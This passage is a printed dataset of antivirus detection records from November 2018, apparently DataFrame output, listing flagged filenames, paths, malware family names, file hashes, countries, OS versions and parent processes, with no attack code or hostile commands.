  Row(detection=Row(filename='updse2.html', filepath='G:\\WD SmartWare\\locale\\en_US.lproj\\UPDSE2.html', filesize=136000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b1e2f8c28dc7ba491be8ddd223f95a46ec4079465e20213cc3eeac7f10c2034f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:15:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_windows-movie-maker.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_windows-movie-maker.exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T14:42:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290b0d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290b0d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:38:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002935c1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002935c1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:28:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl161.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl161.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093258-9a8e0c96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-093258-9A8E0C96', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl117.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl117.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c685', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c685', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:33:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='\\\\\\/V', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T15:06:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:21:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f112', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f112', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:12:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:00:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141022-e4a514bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3ac0d7c\\AVSCAN-20181104-140302-AD230418\\AVSCAN-20181104-141022-E4A514BF', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:10:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165413-2699eeb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-165413-2699EEB6', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='e4dfd76ff691da02eaa433eaf389fc35898121c798cf50c4e2e3b1ddd7e5cf23', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:54:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-01-004627/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:18:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-182702-7b44014a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_732a2416\\AVSCAN-20181101-181636-14C56F4A\\AVSCAN-20181101-182702-7B44014A', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:28:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='btxml.exe', filepath='D:\\電商部\\exe\\BTXML.exe', filesize=896000, name='TR/Dldr.Delphi.Gen.#M300.#R2190'), hash='ff899ccbd07e8062a5922ef2a6561afbff64400a36726c288aa37b93eb84044c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:30:46Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-021432-9980a3e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-021432-9980A3E5', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='30084db8807a5e8a313bb2449496faa258b7df1b9031fb2d7d0a2ef8c9bf5090', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:16:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155921-e9133323', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155921-E9133323', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BB1C7BDD19AEC67347E68ECDCA510472E8EB621CA77116220FCC9CBD7BC7EB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T03:52:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='44.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\44\\44.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='C:\\Users\\X\\Documents\\Guid\\Common\\Common.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T05:23:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T02:10:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stardock+fences+305+crack.exe', filepath='C:\\Users\\USER\\Downloads\\Stardock+Fences+305+Crack.exe', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M2.#R100322'), hash='0785957c5bffc7c719e8905ecc448ed156a28a37746ae30faa4b5dd0fd362bf8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:34:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='C:\\Program Files\\ProKAward\\wap.exe', filesize=4096000, name='TR/SPY.24653.#M1.#R1'), hash='6cf8cd73985f35e6e4e9b09c75225f3ebcd77518fd7b1e749ffb31e6204455d2', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$605F8,3590446,54272,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Award Keylogger Pro 3.1\\\\\\\\klproinstall.exe\\\\\\" ', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-56EMP.tmp\\klproinstall.tmp', parentsize=704000, timestamp='2018-11-02T10:29:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-000200-8b3f8ebc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d946e90\\AVSCAN-20181101-235553-5A2CC07B\\AVSCAN-20181102-000200-8B3F8EBC', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6937173\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Baixaki_JDownloader_2797843724.exe', parentsize=2292152, timestamp='2018-11-02T02:32:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160125-f677ba12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160125-F677BA12', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183406-66df7719', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e2b689b\\AVSCAN-20181102-180350-895CFE35\\AVSCAN-20181102-183406-66DF7719', filesize=9048000, name='PUA/Systweak.Gen4.#M1.#R1'), hash='2b47b9fcc8d7d26f933a3323208ec486445b48704d107e4fe4c7151959156d2b', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:34:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155834-e3e9b030', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155834-E3E9B030', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:35:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (4).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2973184, timestamp='2018-11-02T08:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151643-ae88b058', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_030bbd7c\\AVSCAN-20181102-151216-974A845E\\AVSCAN-20181102-151643-AE88B058', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vctxd.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\PROGRAM\\VCTXD\\VCTXD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdatafat.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATAFAT.exe", filesize=64000, name='TR/Siggen.64000.6.#M1.#R1'), hash='3f8ad9886492f19d0be4d277a4600ae8044d3bda4f0d836239df36f6e3c4bd3a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:27Z'), dt=datetime.date(2018, 11, 2)),
